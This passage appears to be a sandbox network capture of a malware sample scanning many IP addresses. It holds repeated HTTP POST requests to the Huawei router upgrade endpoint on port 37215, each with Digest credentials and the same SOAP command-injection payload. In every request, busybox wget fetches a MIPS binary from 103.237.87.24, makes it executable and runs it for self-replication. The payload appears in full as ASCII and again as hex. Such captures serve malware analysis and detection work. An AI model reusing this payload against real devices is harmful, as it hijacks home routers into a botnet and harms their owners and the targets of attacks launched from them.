20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1246192.168.2.1339398197.5.145.18437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.448829889 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1247192.168.2.1347002197.67.236.21037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.449042082 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1248192.168.2.1354968157.124.92.1337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.449081898 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1249192.168.2.1334058157.175.48.21037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.449111938 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1250192.168.2.133775441.112.188.20937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.449126959 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1251192.168.2.1333206197.80.241.9837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.449140072 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1252192.168.2.1333742121.136.234.18837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.449160099 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1253192.168.2.133749241.148.224.11437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.449160099 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1254192.168.2.1346482197.122.190.24837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.449182987 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1255192.168.2.134655676.182.220.21037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.449206114 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1256192.168.2.1357578157.204.220.24237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.449206114 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
